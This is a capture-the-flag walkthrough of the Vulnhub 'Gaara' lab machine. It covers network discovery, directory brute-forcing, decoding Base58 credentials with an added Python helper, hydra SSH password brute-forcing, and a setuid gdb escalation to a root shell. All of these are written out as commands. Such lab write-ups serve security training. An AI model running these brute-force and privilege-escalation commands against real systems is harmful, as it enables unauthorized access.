Gaara Walkthrough – Vulnhub – Writeup

Gaara by 0xJin is an easy machine from Vulnhub. However, there are some rabbit holes alongside. Also, I have tested this machine on VirtualBox.

Link to the machine: https://www.vulnhub.com/entry/gaara-1,629/

Identify the target

As usual, we have to identify the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, we have to scan the open ports on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.62

This is a simple machine that has HTTP and SSH services available.

Enumerate the web server

The default page had an image and nothing more.

Thus, we have to try brute-forcing the directories.

gobuster dir -u http://10.0.2.62 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log

There is an interesting path that we need to check.

There are three paths to check again. So, I looked at them one by one. All of them contained long texts. Hence, I decided to get unique words from them.

curl http://10.0.2.62/iamGaara | grep -oE '\w+' | sort -u -f | more

The path /iamGaara gave me an encoded text that I could decode using CyberChef. The text contains lowercase letters and the digits 1 and 9, so it is not Base32. Testing for Base58 gave me credentials.
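The alphabet reasoning above can be automated. The following is an added example, not part of the original writeup: it narrows the candidate encodings by character set only and decodes Base58 with the Bitcoin alphabet. The function names are hypothetical and the sample string is a public "Hello World!" test vector, not the text from the machine.

```python
import string

# Alphabets: Base32 per RFC 4648 (A-Z, 2-7); Base58 in its Bitcoin form (no 0, O, I, l).
B32 = set(string.ascii_uppercase + "234567")
B58_CHARS = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B64 = set(string.ascii_letters + string.digits + "+/")

def candidate_encodings(text):
    """Return the encodings whose alphabet covers every character of text.

    Alphabet check only: a match is a candidate to try, not proof."""
    body = set(text.rstrip("="))
    names = []
    if body <= B32:
        names.append("base32")
    if body <= set(B58_CHARS):
        names.append("base58")
    if body <= B64:
        names.append("base64")
    return names

def b58encode(data):
    """Encode bytes as Base58; each leading zero byte becomes a '1'."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58_CHARS[r] + out
    pad = len(data) - len(data.lstrip(b"\0"))
    return "1" * pad + out

def b58decode(text):
    """Decode Base58 text; raises ValueError on a character outside the alphabet."""
    n = 0
    for ch in text:
        n = n * 58 + B58_CHARS.index(ch)
    pad = len(text) - len(text.lstrip("1"))
    return b"\0" * pad + n.to_bytes((n.bit_length() + 7) // 8, "big")

if __name__ == "__main__":
    sample = "2NEpo7TZRRrLZSi2U"  # constructed sample: Base58 of "Hello World!"
    print(candidate_encodings(sample))  # lowercase letters rule out Base32
    print(b58decode(sample))
```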

However, these didn’t work on the SSH server. Still, we now have a username whose password we can brute-force.

hydra -l gaara -P /home/kali/rockyou.txt 10.0.2.62 ssh

Finally, I got a password. Then, I got shell access as the user.

ssh gaara@10.0.2.62

Root privilege escalation

In the directory, there is a file Kazekage.txt that has a path. This is a rabbit hole, but let’s see.

In the directory, there is a secret file.

There is a brainf*ck encoded text that reads the following.

Next, I checked the SUID binaries on the system.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

The gdb binary had the setuid bit set. Hence, we can escalate privileges from here.

Reference: https://gtfobins.github.io/gtfobins/gdb/#suid

gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit

Finally, we got the bash shell with root access. Next, we have the root flag.
